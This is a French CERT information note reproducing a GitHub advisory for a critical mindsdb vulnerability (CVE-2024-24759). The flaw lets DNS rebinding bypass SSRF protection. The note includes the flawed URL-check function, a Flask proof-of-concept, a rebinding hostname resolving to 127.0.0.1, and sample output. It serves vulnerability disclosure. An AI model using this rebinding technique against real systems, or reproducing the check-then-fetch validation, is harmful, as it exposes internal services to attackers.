====================================================================

                                CERT-Renater

                    Note d'Information No. 2024/VULN377
_____________________________________________________________________

DATE                : 18/09/2024

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running mindsdb versions prior
                                  to 23.12.4.3.

=====================================================================
https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4jcv-vp96-94xr
_____________________________________________________________________

Bypass SSRF Protection with DNS Rebinding
Critical
ZoranPandovski published GHSA-4jcv-vp96-94xr Sep 5, 2024

Package
mindsdb (pip)

Affected versions
Before v23.12.4.2

Patched versions
v23.12.4.3


Description

Summary

DNS rebinding is a method of manipulating resolution of domain names
to let the initial DNS query hits an address and the second hits
another one. For instance the host
make-190.119.176.200-rebind-127.0.0.1-rr.1u.ms would be initially
resolved to 190.119.176.200 and the next DNS issue to 127.0.0.1.
Please notice the following in the latest codebase:

def is_private_url(url: str):
     """
     Raises exception if url is private

     :param url: url to check
     """

     hostname = urlparse(url).hostname
     if not hostname:
         # Unable to find hostname in url
         return True
     ip = socket.gethostbyname(hostname)
     return ipaddress.ip_address(ip).is_private

As you can see, during the call to is_private_url() the initial
DNS query would be issued by ip = socket.gethostbyname(hostname)
to an IP (public one) and then due to DNS Rebinding, the next
GET request would goes to the private one.


PoC

from flask import Flask, request, jsonify
from urllib.parse import urlparse
import socket
import ipaddress
import requests

app = Flask(__name__)


def is_private_url(url: str):
     """
     Raises exception if url is private

     :param url: url to check
     """

     hostname = urlparse(url).hostname
     if not hostname:
         # Unable to find hostname in url
         return True
     ip = socket.gethostbyname(hostname)
     if ipaddress.ip_address(ip).is_private:
         raise Exception(f"Private IP address found for {url}")


@app.route("/", methods=["GET"])
def index():
     return 
"http://127.0.0.1:5000/check_private_url?url=https://www.google.Fr"


@app.route("/check_private_url", methods=["GET"])
def check_private_url():
     url = request.args.get("url")

     if not url:
         return jsonify({"error": 'Missing "url" parameter'}), 400

     try:
         is_private_url(url)
         response = requests.get(url)

         return jsonify(
             {
                 "url": url,
                 "is_private": False,
                 "text": response.text,
                 "status_code": response.status_code,
             }
         )
     except Exception as e:
         return jsonify({"url": url, "is_private": True, "error": str(e)})


if __name__ == "__main__":
     app.run(debug=True)

After running the poc.py with flask installed, consider visiting
the following URLs:

     http://127.0.0.1:5000/check_private_url?url=https://www.example.com
since it is in the public space, you would get is_private: false
and the GET request would be issued to the www.Example.com website.

     http://127.0.0.1:5000/check_private_url?url=http://localhost:8667,
this one the address is private, you would get is_private: true

  
http://127.0.0.1:5000/check_private_url?url=http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/
But this one, it initially returns the public IP 190.119.176.214 and
then DNS rebind into the network location 127.0.0.1:8667.

I set up a simple HTTP server at 127.0.0.1:8667, you can notice
the results of the PoC in the next screenshot:

{
   "is_private": false,
   "status_code": 200,
   "text": "<pre>\n<a href=\"poc.py\">poc.py</a>\n</pre>\n",
   "url": "http://make-190.119.176.214-rebind-127.0.0.1-rr.1u.ms:8667/"
}


Impact

     Bypass the SSRF protection on the whole website with DNS Rebinding.
     DoS too.


Severity
Critical

9.3 / 10

CVSS v3 base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
None

User interaction
None

Scope
Changed

Confidentiality
High

Integrity
None

Availability
Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

CVE ID
CVE-2024-24759

Weaknesses
CWE-918


Credits

     @Sim4n6 Sim4n6 Finder



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================